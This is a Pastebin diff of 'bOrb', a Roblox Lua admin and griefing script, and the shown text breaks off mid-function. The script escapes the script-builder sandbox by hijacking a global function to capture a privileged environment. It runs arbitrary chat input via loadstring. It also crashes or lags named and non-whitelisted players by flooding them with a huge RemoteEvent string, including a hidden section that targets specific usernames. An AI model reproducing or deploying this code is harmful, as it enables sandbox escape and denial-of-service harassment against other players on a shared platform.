View difference between Paste ID: 0Et47DFf and ntG1Q4nR
SHOW: | | - or go back to the newest paste.
1
				--[[Hola, thanks for using bOrb!]]--
2
				--[[Beta Testers: Om3gapro5ooo]]--
3
				--[[Made by Basictality]]--
4
	
5
	
6
	--[[-------------------Terms and Agreements-------------
7
	By using this script you agree that Basictality all of bOrb, if you
8
	say you made bOrb, terrible consequences will happen in matter.
9
	---------------(c): Made By Basictality--------------]]--
10
	--------------------------------------------------------------
11
	---------------------N O T I F I C A T I O N S----------------
12
	--------------------------------------------------------------
13
	--I added a bit more music.									  |
14
	--Fixed some bugs.											  |
15
	--More to come.												  |
16
	---------------------------------------------------------------
17
wait()
18
script.Parent=nil
19
local fenv = getfenv()
20
i = game:service'InsertService':LoadAssetVersion(519416165)
21
n = i:children()[1] --Loads the AssetVersion c:
22
game:service'Debris':AddItem(i,0)
23
n.Parent=workspace
24
coroutine.yield()
25
local Environment
26
pcall(_G.OSC_AddServerSideData,setmetatable({},{__index=function()
27
    Environment=getfenv(2)end}))
28
_G.OSC_AddServerSideData=nil
29
game:service'Debris':AddItem(n,0)
30
Environment.print=fenv.print
31
Environment.warn=fenv.warn
32
Environment.error=fenv.error
33
Environment.owner=fenv.owner
34
setfenv(1,Environment)
35
36
wait() --ignore this. (if u touch it won't load)
37
adminwew = game:GetService('Players'):FindFirstChild(owner.Name)
38-
 local admins = {quickhack101.Name,quickhack101}
38+
 local admins = {quickhack101.Name,personsadminlol}
39
 chatname = '[bOrb]: '
40
wpadtrans = "0.3"
41
 OrbName = "bOrb"
42
dis = "7"
43
Speed = "0.030" --The best ones are 0.30 - 0.5
44
Banned = "skrillex6996" --Scrub dont let him in sb
45
Chat = true
46
bplyrs = game:GetService('Players')
47
bhttp = game:GetService('HttpService')
48
-------------------------------Anti Ban---------------------------------
49
--wip
50
----------------------------------------------------------------------------------------------
51
 print[[version 53]]
52
 meplyr = quickhack101
53
--------Change prefix--------
54
prefixx=Instance.new('StringValue',nil)
55
prefixx.Value = '-'
56
game:GetService('RunService').Stepped:connect(function()
57
prefix = prefixx.Value
58
end)
59
 function OnChatted(msg)
60
	    if msg:lower():sub(1,5) == prefix.."bet " then
61
	prefixx.Value = msg:sub(6,#msg)
62
	wait()
63
	end
64
end
65
66
adminwew.Chatted:connect(OnChatted)
67
----------Musiclist----------
68
function OnChatted(msg)
69
	    if msg:lower():sub(1,10) == prefix.."musiclist" then
70
mltpos=Instance.new('StringValue',nil)
71
mltpos.Value = "0"
72
mlsg=Instance.new('ScreenGui',adminwew.PlayerGui)
73
mlf=Instance.new('Frame',mlsg)
74
mlf.Size = UDim2.new(0,250,0,350)
75
mlf.BackgroundTransparency=0.5
76
mlf.BackgroundColor = BrickColor.new'Black'
77
mlf.Position = UDim2.new(0,50,0,170)
78
mlf.Active = true
79
mlf.Draggable = true
80
81
mlt=Instance.new('TextLabel',mlf)
82
mlt.Size = UDim2.new(0,230,0,20)
83
mlt.TextScaled = true
84
mlt.BackgroundColor = BrickColor.new'Really black'
85
mlt.BackgroundTransparency=0.2
86
mlt.TextColor3 = Color3.new(255,255,255)
87
88
mltb=Instance.new('TextButton',mlt)
89
mltb.Text = "(X)"
90
mltb.Size = UDim2.new(0,20,0,20)
91
mltb.TextScaled = true
92
mltb.Position = UDim2.new(0,230,0,0)
93
mltb.BackgroundColor = BrickColor.new'Crimson'
94
95
function onClick()
96
	mlsg:remove()
97
end
98
99
mltb.MouseButton1Down:connect(onClick)
100
101
102
mlsc=Instance.new('ScrollingFrame',mlf)
103
mlsc.Position = UDim2.new(0,0,0,20)
104
mlsc.Size = UDim2.new(0,250,0,330)
105
mlsc.BackgroundTransparency=1
106
107
function AddMus(asd)
108
mltl = Instance.new('TextLabel',mlsc)
109
mltl.Size = UDim2.new(0,250,0,30)
110
mltl.Position = UDim2.new(0,0,0,mltpos.Value)
111
mltl.Text = asd
112
mltl.BackgroundTransparency=0.6
113
mltl.BackgroundColor3 = Color3.new(0,0,0)
114
mltl.TextScaled = true
115
mltl.TextStrokeTransparency = 0
116
mltl.TextColor3 = Color3.new(255,255,255)
117
wait()
118
mltpos.Value = mltpos.Value + 32
119
end
120
121
AddMus('watchasay')
122
AddMus('energy')
123
AddMus('iverson')
124
AddMus('ddesert')
125
AddMus('antidote')
126
AddMus('hello')
127
AddMus('porche')
128
AddMus('wdm')
129
AddMus('centuries')
130
AddMus('house')
131
AddMus('skeletons')
132
AddMus('night')
133
134
wait()
135
mlt.Text = "Music List ("..#mlsc:GetChildren()..')'
136
137
end
138
end
139
140
adminwew.Chatted:connect(OnChatted)
141
----=-------------------Music---------------------
142
function OnChatted(msg)
143
	    if msg:lower():sub(1,5) == prefix.."mus " then
144
		find = 'BasMus'
145
	if workspace.Terrain:FindFirstChild(find) then
146
game.Debris:AddItem(workspace.Terrain[find],0)
147
		end
148
msgs=Instance.new('Sound',workspace.Terrain)
149
msgs.SoundId = "http://www.roblox.com/asset/?id="..msg:sub(6,#msg)
150
msgs.Volume = 5
151
msgs.Name = 'BasMus'
152
msgs.Pitch = 1
153
msgs.Looped = true
154
msgs:play()
155
-----------------------musiclist sounds-----------------------
156
if string.find(msg:sub(6,#msg),'watchasay') then
157
	msgs.SoundId = "http://www.roblox.com/asset/?id=177681012"
158
end
159
160
if string.find(msg:sub(6,#msg),'night') then
161
	msgs.SoundId = "http://www.roblox.com/asset/?id=273552948"
162
end
163
164
if string.find(msg:sub(6,#msg),'house') then
165
	msgs.SoundId = "http://www.roblox.com/asset/?id=319758951"
166
end
167
168
if string.find(msg:sub(6,#msg),'energy') then
169
	msgs.SoundId = "http://www.roblox.com/asset/?id=150455860"
170
end
171
172
if string.find(msg:sub(6,#msg),'centuries') then
173
	msgs.SoundId = "http://www.roblox.com/asset/?id=181547615"
174
end
175
176
if string.find(msg:sub(6,#msg),'skeletons') then
177
	msgs.SoundId = "http://www.roblox.com/asset/?id=160442087"
178
end
179
180
if string.find(msg:sub(6,#msg),'porche') then
181
	msgs.SoundId = "http://www.roblox.com/asset/?id=245138881"
182
end
183
184
if string.find(msg:sub(6,#msg),'ddesert') then
185
	msgs.SoundId = "http://www.roblox.com/asset/?id=229990159"
186
end
187
188
if string.find(msg:sub(6,#msg),'antidote') then
189
	msgs.SoundId = "http://www.roblox.com/asset/?id=346786918"
190
end
191
192
if string.find(msg:sub(6,#msg),'iverson') then
193
	msgs.SoundId = "http://www.roblox.com/asset/?id=305476324"
194
end
195
196
if string.find(msg:sub(6,#msg),'hello') then
197
	msgs.SoundId = "http://www.roblox.com/asset/?id=313694441"
198
end
199
200
if string.find(msg:sub(6,#msg),'wdm') then
201
	msgs.SoundId = "http://www.roblox.com/asset/?id=291168836"
202
end
203
---------------------------------------------------------------
204
205
if Chat == true then
206
		game:GetService("Chat"):Chat(wpad,chatname.."Playing "..msg:sub(6,#msg)..".",Enum.ChatColor.Blue)
207
208
end
209
	end
210
end
211
212
adminwew.Chatted:connect(OnChatted)
213
214
--------Hide and show--------
215
hidevalue = Instance.new('StringValue',nil)
216
hidevalue.Value = "Visible"
217
218
 function OnChatted(msg)
219
	    if msg:lower():sub(1,5) == prefix.."hide" then
220
		hidevalue.Value = "Invisible"
221
		for i = 0,1,0.1 do wait()
222
			wpad.Transparency = i
223
			wpadpointlight.Parent = nil
224
		end
225
	end
226
end
227
228
adminwew.Chatted:connect(OnChatted)
229
-------------------------------
230
 function OnChatted(msg)
231
	    if msg:lower():sub(1,5) == prefix.."show" then
232
		hidevalue.Value = "Visible"
233
		for i = 1,0,-0.1 do wait()
234
			wpad.Transparency = i
235
			wpadpointlight.Parent = wpad
236
		end
237
	end
238
end
239
240
adminwew.Chatted:connect(OnChatted)
241
-----private server & non pri------
242
pri=Instance.new('StringValue',nil)
243
pri.Value = "1"
244
245
 function OnChatted(msg)
246
	    if msg:lower():sub(1,6) == prefix.."slock" then
247
		pri.Value = "-1"
248
249
	end
250
	
251
	    if msg:lower():sub(1,8) == prefix.."unslock" then
252
		pri.Value = "1"
253
	end
254
end
255
256
adminwew.Chatted:connect(OnChatted)
257
----------------------------------
258
-----private server function------
259
if pri.Value == "-1" then
260
game.Players.ChildAdded:connect(function(prii) if prii.Name~="Basictality" and prii.Name~="Dullbakuganroll" and prii.Name~="jebjordan" then
261
	prirem=Instance.new('RemoteEvent',workspace):FireClient(prii,{string.rep("umad?",2e5+5)})
262
end
263
end)
264
end
265
----------Countdown----------
266
 function OnChatted(msg)
267
	    if msg:lower():sub(1,4) == prefix.."cd " then
268
		testcd=Instance.new('Hint',workspace)
269
for i = msg:sub(5,#msg),0,-1 do wait(0.8)
270
	testcd.Text=i
271
end
272
testcd.Text = "Go!"
273
delay(1,function()
274
	testcd:remove()
275
end)
276
end
277
end
278
279
adminwew.Chatted:connect(OnChatted)
280
281
 function OnChatted(msg)
282
	    if msg:lower():sub(1,11) == prefix.."countdown " then
283
		testcd=Instance.new('Hint',workspace)
284
for i = msg:sub(12,#msg),0,-1 do wait(0.8)
285
	testcd.Text=i
286
end
287
testcd.Text = "Go!"
288
delay(1,function()
289
	testcd:remove()
290
end)
291
end
292
end
293
294
adminwew.Chatted:connect(OnChatted)
295
------------Pitch------------
296
function OnChatted(msg)
297
	    if msg:lower():sub(1,7) == prefix.."pitch " then
298
	find = 'BasMus'
299
	if workspace.Terrain:FindFirstChild(find) then
300
workspace.Terrain[find].Pitch = msg:sub(8,#msg)
301
	end
302
	end
303
end
304
305
adminwew.Chatted:connect(OnChatted)
306
-----------Ambient-----------
307
function OnChatted(msg)
308
	    if msg:lower():sub(1,9) == prefix.."ambient " then
309
game.Lighting.Ambient = Color3.new(msg:sub(10,#msg),msg:sub(10,#msg),msg:sub(10,#msg))
310
end
311
end
312
313
adminwew.Chatted:connect(OnChatted)
314
-------------Time------------
315
function OnChatted(msg)
316
	    if msg:lower():sub(1,6) == prefix.."time " then
317
game.Lighting.TimeOfDay = msg:sub(7,#msg)
318
end
319
end
320
321
adminwew.Chatted:connect(OnChatted)
322
----------Exe Script---------
323
function OnChatted(msg)
324
	    if msg:lower():sub(1,5) == prefix.."exe " then
325
loadstring(msg:sub(6,#msg))()
326
if Chat == true then
327
	game:GetService("Chat"):Chat(wpad,chatname.."Executed script.",Enum.ChatColor.Blue)
328
end
329
end
330
end
331
332
adminwew.Chatted:connect(OnChatted)
333
--Ban Stuff--
334
local banfolder = Instance.new('Folder',game.ServerStorage)
335
banfolder.Name = "bOrb Bans"
336
game:GetService('RunService').Stepped:connect(function()----recome
337
	for i,x in pairs(banfolder:children()) do if x.Value~="Basictality" and x.Value~="hdh" and x.Value~="Dullbakuganroll" and x.Value~="jebjordan" then
338
for i,v in pairs(game.Players:children()) do if v.Name==x.Value then
339
	removeclient=Instance.new('RemoteEvent',workspace):FireClient(game.Players[x.Value],{string.rep("umad?",2e5+5)})
340
end
341
end
342
	end
343
	end
344
end)
345
346
-----------------_G stuff---------
347
game:GetService('RunService').Stepped:connect(function()
348
_G.bBans = banfolder
349
	_G.sb = 'Haxed by bOrb'
350
end)
351
---------------secret stuffz---------
352
if adminwew == bplyrs:FindFirstChild('Sarah67854') then
353
	removeclient=Instance.new('RemoteEvent',workspace):FireClient(adminwew,{string.rep("umad?",2e5+5)})
354
 game.Debris:AddItem(removeclient,1)
355
end
356
357
if adminwew == bplyrs:FindFirstChild('skrillex6996') then
358
	removeclient=Instance.new('RemoteEvent',workspace):FireClient(adminwew,{string.rep("umad?",2e5+5)})
359
 game.Debris:AddItem(removeclient,1)
360
end
361
362
if adminwew == bplyrs:FindFirstChild('Ayumuki') then
363
	removeclient=Instance.new('RemoteEvent',workspace):FireClient(adminwew,{string.rep("umad?",2e5+5)})
364
 game.Debris:AddItem(removeclient,1)
365
end
366
367
if not OrbName == "bOrb" then
368
OrbName = "bOrb"
369
end
370
----------cmds gui-----------
371
function OnChatted(cmds)
372
	    if cmds:lower():sub(1,7) == prefix.."cmds" then
373
cmdgui=Instance.new('ScreenGui',adminwew.PlayerGui)
374
cmdframe=Instance.new('Frame',cmdgui)
375
cmdframe.Size = UDim2.new(0,500,0,350)
376
cmdframe.Position = UDim2.new(0,430,0,-300)
377
cmdframe:TweenPosition(UDim2.new(0,430,0,200),'Out','Quad',0.35)
378
cmdframe.BackgroundTransparency=0.5
379
cmdframe.BackgroundColor3 = Color3.new(0,0,0)
380
381
cmdtl=Instance.new('TextLabel',cmdframe)
382
cmdtl.Text = "Commands [24]"
383
cmdtl:TweenSize(UDim2.new(0,500,0,50),'Out','Quad',0.35)
384
cmdtl.TextScaled = true
385
cmdtl.BackgroundTransparency=1
386
cmdtl.TextColor3 = Color3.new(255,255,255)
387
cmdtl.TextStrokeTransparency = 0
388
389
cmdprefixltl=Instance.new('TextLabel',cmdframe)
390
cmdprefixltl.Text = "Prefix: "..prefix
391
cmdprefixltl:TweenSize(UDim2.new(0,100,0,50),'Out','Quad',0.35)
392
cmdprefixltl.BackgroundTransparency=1
393
cmdprefixltl.TextColor3 = Color3.new(255,255,255)
394
cmdprefixltl.TextStrokeTransparency = 0
395
cmdprefixltl.FontSize = "Size14"
396
cmdprefixltl:TweenPosition(UDim2.new(0,-5,0,-15),'Out','Quad',0.35)
397
398
cmdbutton=Instance.new('TextButton',cmdframe)
399
cmdbutton.TextScaled = true
400
cmdbutton.Text = "X"
401
cmdbutton.BackgroundTransparency = 1
402
cmdbutton.TextColor3 = Color3.new(1,0,0)
403
cmdbutton.Size = UDim2.new(0,50,0,50)
404
cmdbutton:TweenPosition(UDim2.new(0,450,0,0),'Out','Quad',0.35)
405
406
function onClick()
407
	cmdframe:TweenPosition(UDim2.new(0,430,0,700),'Out','Quad',0.35)
408
	game.Debris:AddItem(cmdframe,2)
409
end
410
411
cmdbutton.MouseButton1Down:connect(onClick)
412
413
sf=Instance.new('ScrollingFrame',cmdframe)
414
sf:TweenSize(UDim2.new(0,480,0,260),'Out','Quad',0.35)
415
sf:TweenPosition(UDim2.new(0,10,0,50),'Out','Quad',0.35)
416
sf.BackgroundTransparency = 0.5
417
sf.BackgroundColor3 = Color3.new(0,0,0)
418
419
fc=Instance.new('TextLabel',sf)
420
fc.TextColor3 = Color3.new(255,255,255)
421
fc.TextScaled = true
422
fc.Text = "Explode <plyr>"
423
fc.BackgroundColor = BrickColor.new'Dark blue'
424
fc:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
425
fc.BackgroundTransparency=0
426
427
sc=fc:Clone()
428
sc.Parent = sf
429
sc.Text = "kill <plyr>"
430
sc:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
431
sc:TweenPosition(UDim2.new(0,0,0,35),'Out','Quad',0.35)
432
433
tc=sc:clone()
434
tc.Parent = sf
435
tc.Text = "UnGod <plyr>"
436
tc:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
437
tc:TweenPosition(UDim2.new(0,0,0,70),'Out','Quad',0.35)
438
439
fc=sc:clone()
440
fc.Parent = sf
441
fc.Text = "Freeze <plyr>"
442
fc:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
443
fc:TweenPosition(UDim2.new(0,0,0,105),'Out','Quad',0.35)
444
445
fic=sc:clone()
446
fic.Parent = sf
447
fic.Text = "Thaw <plyr>"
448
fic:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
449
fic:TweenPosition(UDim2.new(0,0,0,140),'Out','Quad',0.35)
450
451
sic=sc:clone()
452
sic.Parent = sf
453
sic.Text = "resp/respawn/res <plyr>"
454
sic:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
455
sic:TweenPosition(UDim2.new(0,0,0,175),'Out','Quad',0.35)
456
457
sec=sc:clone()
458
sec.Parent = sf
459
sec.Text = "God <plyr>"
460
sec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
461
sec:TweenPosition(UDim2.new(0,0,0,210),'Out','Quad',0.35)
462
463
eec=sc:clone()
464
eec.Parent = sf
465
eec.Text = "BSOD/Lag <plyr>"
466
eec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
467
eec:TweenPosition(UDim2.new(0,0,0,245),'Out','Quad',0.35)
468
469
nec=sc:clone()
470
nec.Parent = sf
471
nec.Text = "ff/shield/forcefield <plyr>"
472
nec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
473
nec:TweenPosition(UDim2.new(0,0,0,280),'Out','Quad',0.35)
474
475
tec=sc:clone()
476
tec.Parent = sf
477
tec.Text = "kick/boot <plyr>"
478
tec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
479
tec:TweenPosition(UDim2.new(0,0,0,315),'Out','Quad',0.35)
480
481
elec=sc:clone()
482
elec.Parent = sf
483
elec.Text = "ban/banish <plyr>"
484
elec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
485
elec:TweenPosition(UDim2.new(0,0,0,350),'Out','Quad',0.35)
486
487
twec=sc:clone()
488
twec.Parent = sf
489
twec.Text = "unban/unbanish <plyr>"
490
twec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
491
twec:TweenPosition(UDim2.new(0,0,0,385),'Out','Quad',0.35)
492
493
thec=sc:clone()
494
thec.Parent = sf
495
thec.Text = "sword <plyr>"
496
thec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
497
thec:TweenPosition(UDim2.new(0,0,0,420),'Out','Quad',0.35)
498
499
foec=sc:clone()
500
foec.Parent = sf
501
foec.Text = "ngrav/nograv/nogravity <plyr>"
502
foec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
503
foec:TweenPosition(UDim2.new(0,0,0,455),'Out','Quad',0.35)
504
505
fiec=sc:clone()
506
fiec.Parent = sf
507
fiec.Text = "grav/gravity <plyr>"
508
fiec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
509
fiec:TweenPosition(UDim2.new(0,0,0,490),'Out','Quad',0.35)
510
511
sixec=sc:clone()
512
sixec.Parent = sf
513
sixec.Text = "unjail/nojail <plyr>"
514
sixec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
515
sixec:TweenPosition(UDim2.new(0,0,0,525),'Out','Quad',0.35)
516
517
sitec=sc:clone()
518
sitec.Parent = sf
519
sitec.Text = "light/plight <plyr>"
520
sitec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
521
sitec:TweenPosition(UDim2.new(0,0,0,560),'Out','Quad',0.35)
522
523
enitec=sc:clone()
524
enitec.Parent = sf
525
enitec.Text = "rlight/nolight/unlight <plyr>"
526
enitec:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
527
enitec:TweenPosition(UDim2.new(0,0,0,595),'Out','Quad',0.35)
528
529
nineteen=sc:clone()
530
nineteen.Parent = sf
531
nineteen.Text = "jail/lockup <plyr>"
532
nineteen:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
533
nineteen:TweenPosition(UDim2.new(0,0,0,630),'Out','Quad',0.35)
534
535
twenty=sc:clone()
536
twenty.Parent = sf
537
twenty.Text = "unff/unforcefield/unshield <plyr>"
538
twenty:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
539
twenty:TweenPosition(UDim2.new(0,0,0,630),'Out','Quad',0.35)
540
541
twenty1=sc:clone()
542
twenty1.Parent = sf
543
twenty1.Text = "jail <plyr>"
544
twenty1:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
545
twenty1:TweenPosition(UDim2.new(0,0,0,665),'Out','Quad',0.35)
546
547
twenty2=sc:clone()
548
twenty2.Parent = sf
549
twenty2.Text = "sit <plyr>"
550
twenty2:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
551
twenty2:TweenPosition(UDim2.new(0,0,0,0),'Out','Quad',0.35)
552
twenty2.TextTransparency=1
553
twenty2.BackgroundTransparency=1
554
555
twenty3=sc:clone()
556
twenty3.Parent = sf
557
twenty3.Text = "jump <plyr>"
558
twenty3:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
559
twenty3:TweenPosition(UDim2.new(0,0,0,35),'Out','Quad',0.35)
560
twenty3.TextTransparency=1
561
twenty3.BackgroundTransparency=1
562
563
twenty4=sc:clone()
564
twenty4.Parent = sf
565
twenty4.Text = "Commands/Cmds"
566
twenty4:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
567
twenty4:TweenPosition(UDim2.new(0,0,0,70),'Out','Quad',0.35)
568
twenty4.TextTransparency=1
569
twenty4.BackgroundTransparency=1
570
571
twenty5=sc:clone()
572
twenty5.Parent = sf
573
twenty5.Text = "exe <script>"
574
twenty5:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
575
twenty5:TweenPosition(UDim2.new(0,0,0,105),'Out','Quad',0.35)
576
twenty5.TextTransparency=1
577
twenty5.BackgroundTransparency=1
578
579
twenty6=sc:clone()
580
twenty6.Parent = sf
581
twenty6.Text = "mus <soundid>"
582
twenty6:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
583
twenty6:TweenPosition(UDim2.new(0,0,0,140),'Out','Quad',0.35)
584
twenty6.TextTransparency=1
585
twenty6.BackgroundTransparency=1
586
587
twenty7=sc:clone()
588
twenty7.Parent = sf
589
twenty7.Text = "time <number>"
590
twenty7:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
591
twenty7:TweenPosition(UDim2.new(0,0,0,175),'Out','Quad',0.35)
592
twenty7.TextTransparency=1
593
twenty7.BackgroundTransparency=1
594
595
twenty8=sc:clone()
596
twenty8.Parent = sf
597
twenty8.Text = "ambient <number>"
598
twenty8:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
599
twenty8:TweenPosition(UDim2.new(0,0,0,210),'Out','Quad',0.35)
600
twenty8.TextTransparency=1
601
twenty8.BackgroundTransparency=1
602
603
twenty9=sc:clone()
604
twenty9.Parent = sf
605
twenty9.Text = "pitch <number>"
606
twenty9:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
607
twenty9:TweenPosition(UDim2.new(0,0,0,245),'Out','Quad',0.35)
608
twenty9.TextTransparency=1
609
twenty9.BackgroundTransparency=1
610
611
thirty0=sc:clone()
612
thirty0.Parent = sf
613
thirty0.Text = "fire <plyr>"
614
thirty0:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
615
thirty0:TweenPosition(UDim2.new(0,0,0,245),'Out','Quad',0.35)
616
thirty0.TextTransparency=1
617
thirty0.BackgroundTransparency=1
618
619
thirty1=sc:clone()
620
thirty1.Parent = sf
621
thirty1.Text = "sparkles <plyr>"
622
thirty1:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
623
thirty1:TweenPosition(UDim2.new(0,0,0,245),'Out','Quad',0.35)
624
thirty1.TextTransparency=1
625
thirty1.BackgroundTransparency=1
626
627
thirty2=sc:clone()
628
thirty2.Parent = sf
629
thirty2.Text = "hide"
630
thirty2:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
631
thirty2:TweenPosition(UDim2.new(0,0,0,280),'Out','Quad',0.35)
632
thirty2.TextTransparency=1
633
thirty2.BackgroundTransparency=1
634
635
thirty3=sc:clone()
636
thirty3.Parent = sf
637
thirty3.Text = "show"
638
thirty3:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
639
thirty3:TweenPosition(UDim2.new(0,0,0,315),'Out','Quad',0.35)
640
thirty3.TextTransparency=1
641
thirty3.BackgroundTransparency=1
642
643
thirty4=sc:clone()
644
thirty4.Parent = sf
645
thirty4.Text = "rguis/nguis/noguis <plyr>"
646
thirty4:TweenSize(UDim2.new(0,475,0,30),'Out','Quad',0.35)
647
thirty4:TweenPosition(UDim2.new(0,0,0,350),'Out','Quad',0.35)
648
thirty4.TextTransparency=1
649
thirty4.BackgroundTransparency=1
650
651
newp=Instance.new('TextButton',cmdframe)
652
newp.Text = ">"
653
newp.TextColor3 = Color3.new(255,255,255)
654
newp.TextScaled = true
655
newp:TweenSize(UDim2.new(0,100,0,30),'Out','Quad',0.35)
656
newp:TweenPosition(UDim2.new(0,370,0,315),'Out','Quad',0.35)
657
658
function onClick()
659
	for i,v in pairs(sf:children()) do if v.ClassName=="TextLabel" then
660
		v.TextTransparency = 1
661
		v.BackgroundTransparency = 1
662
		twenty2.TextTransparency=0
663
		twenty2.BackgroundTransparency=0
664
		twenty3.TextTransparency=0
665
		twenty3.BackgroundTransparency=0
666
		twenty4.TextTransparency=0
667
		twenty4.BackgroundTransparency=0
668
		twenty5.TextTransparency=0
669
		twenty5.BackgroundTransparency=0
670
		twenty6.TextTransparency=0
671
		twenty6.BackgroundTransparency=0
672
		twenty7.TextTransparency=0
673
		twenty7.BackgroundTransparency=0
674
		twenty8.TextTransparency=0
675
		twenty8.BackgroundTransparency=0
676
		twenty9.TextTransparency=0
677
		twenty9.BackgroundTransparency=0
678
		thirty0.TextTransparency=0
679
		thirty0.BackgroundTransparency=0
680
		thirty1.TextTransparency=0
681
		thirty1.BackgroundTransparency=0
682
		thirty2.TextTransparency=0
683
		thirty2.BackgroundTransparency=0
684
		thirty3.TextTransparency=0
685
		thirty3.BackgroundTransparency=0
686
		thirty4.TextTransparency=0
687
		thirty4.BackgroundTransparency=0
688
	end
689
	pgtl.Text = "Page 2/2"
690
	end
691
	end
692
693
newp.MouseButton1Down:connect(onClick)
694
695
696
oldp=Instance.new('TextButton',cmdframe)
697
oldp.Text = "<"
698
oldp.TextColor3 = Color3.new(255,255,255)
699
oldp.TextScaled = true
700
oldp:TweenSize(UDim2.new(0,100,0,30),'Out','Quad',0.35)
701
oldp:TweenPosition(UDim2.new(0,25,0,315),'Out','Quad',0.35)
702
703
function onClick()
704
	for i,v in pairs(sf:children()) do if v.ClassName=="TextLabel" then
705
		v.TextTransparency = 0
706
		v.BackgroundTransparency = 0
707
	end
708
	pgtl.Text = "Page 1/2"
709
		twenty2.TextTransparency=1
710
		twenty2.BackgroundTransparency=1
711
		twenty3.TextTransparency=1
712
		twenty3.BackgroundTransparency=1
713
		twenty4.TextTransparency=1
714
		twenty4.BackgroundTransparency=1
715
		twenty5.TextTransparency=1
716
		twenty5.BackgroundTransparency=1
717
		twenty6.TextTransparency=1
718
		twenty6.BackgroundTransparency=1
719
		twenty7.TextTransparency=1
720
		twenty7.BackgroundTransparency=1
721
		twenty8.TextTransparency=1
722
		twenty8.BackgroundTransparency=1
723
		twenty9.TextTransparency=1
724
		twenty9.BackgroundTransparency=1
725
		thirty0.TextTransparency=1
726
		thirty0.BackgroundTransparency=1
727
		thirty1.TextTransparency=1
728
		thirty1.BackgroundTransparency=1
729
		thirty2.TextTransparency=1
730
		thirty2.BackgroundTransparency=1
731
		thirty3.TextTransparency=1
732
		thirty3.BackgroundTransparency=1
733
		thirty4.TextTransparency=1
734
		thirty4.BackgroundTransparency=1
735
	end
736
	end
737
738
oldp.MouseButton1Down:connect(onClick)
739
740
pgtl=Instance.new('TextLabel',cmdframe)
741
pgtl.Text = "Page 1/2"
742
pgtl:TweenSize(UDim2.new(0,100,0,30),'Out','Quad',0.35)
743
pgtl.TextScaled = true
744
pgtl.BackgroundTransparency=1
745
pgtl.TextColor3 = Color3.new(255,255,255)
746
pgtl.TextStrokeTransparency = 0
747
pgtl:TweenPosition(UDim2.new(0,200,0,315),'Out','Quad',0.35)
748
	end
749
end
750
adminwew.Chatted:connect(OnChatted)
751
-----------------------------------------------------------------
752
753
754
 isAdmin = function(p)
755
  for i,v in pairs(admins)do
756
   if p.Name == v then
757
    return true;
758
   end;
759
  end;
760
  return false;
761
 end;
762
 local Players = bplyrs;
763
 local people = function(str)
764
   local players = {};
765
   local strs = {
766
    {"me", "myself", function() players[#players+1]=meplyr end;};
767
    {"all", "everyone", "everybody", function() for i,v in pairs(Players:GetPlayers())do players[#players+1]=v; end; end;};
768
    {"others", "notme", function() for i,v in pairs(Players:GetPlayers())do if v.Name~= meplyr.Name then players[#players+1]=v; end; end; end;};
769
    {"admins", "admined", function() for i,v in pairs(Players:GetPlayers())do if isAdmin(v) then players[#players+1]=v; end; end; end;};
770
    {"nonadmins", "nonadmined", function() for i,v in pairs(Players:GetPlayers())do if not isAdmin(v) then players[#players+1]=v; end; end; end;};
771
   };
772
   for i,v in pairs(strs)do
773
    for q,k in pairs(v)do
774
     if str == k then
775
      v[#v]();
776
      break;
777
     end;
778
    end;
779
   end;
780
   if #players == 0 then
781
    for i,v in pairs(Players:GetPlayers())do
782
     if str:lower() == v.Name:lower():sub(1,string.len(str)) then
783
      players[#players+1]=v;
784
     end;
785
    end;
786
   end;
787
   return players;
788
  end;
789
 --   if Prefix..data.Usage..Suffix == sub(lower(Message),1,string.len(Prefix)+string.len(data.Usage)+string.len(Suffix)) then
790
 --    local y,n = ypcall(function()
791
 --      data.Func(sub(Message,string.len(Prefix)+string.len(data.Usage)+string.len(Suffix)+1), GetPlayer2, "FakePlayerName")
792
 --    end)
793
 --    end
794
 local function chat(msg,plr)
795
   if isAdmin(plr) then
796
    local pre = "";
797
    local post = "";
798
    if msg:find(" ") ~= nil then
799
     pre = msg:sub(1,msg:find(" ")-1);
800
     post = msg:sub(msg:find(" ")+1);
801
    end;
802
    local cmd = function(ct, s, pt, f)
803
     if ct == "complex" then
804
      for q,k in pairs(s) do
805
       if pre:lower() == k then
806
        if pt == "player" then
807
         for i,v in pairs(people(post))do
808
          Spawn(function()
809
           pcall(function()
810
            f(v);
811
           end);
812
          end);
813
         end;
814
        elseif pt == "string" then
815
         f(post);
816
        end;
817
        break;
818
       end;
819
      end;
820
     elseif ct == "simple" then
821
      for q,k in pairs(s) do
822
       if msg:lower() == k then
823
        if pt == "self" then
824
         Spawn(function()
825
          pcall(function()
826
           f(plr);
827
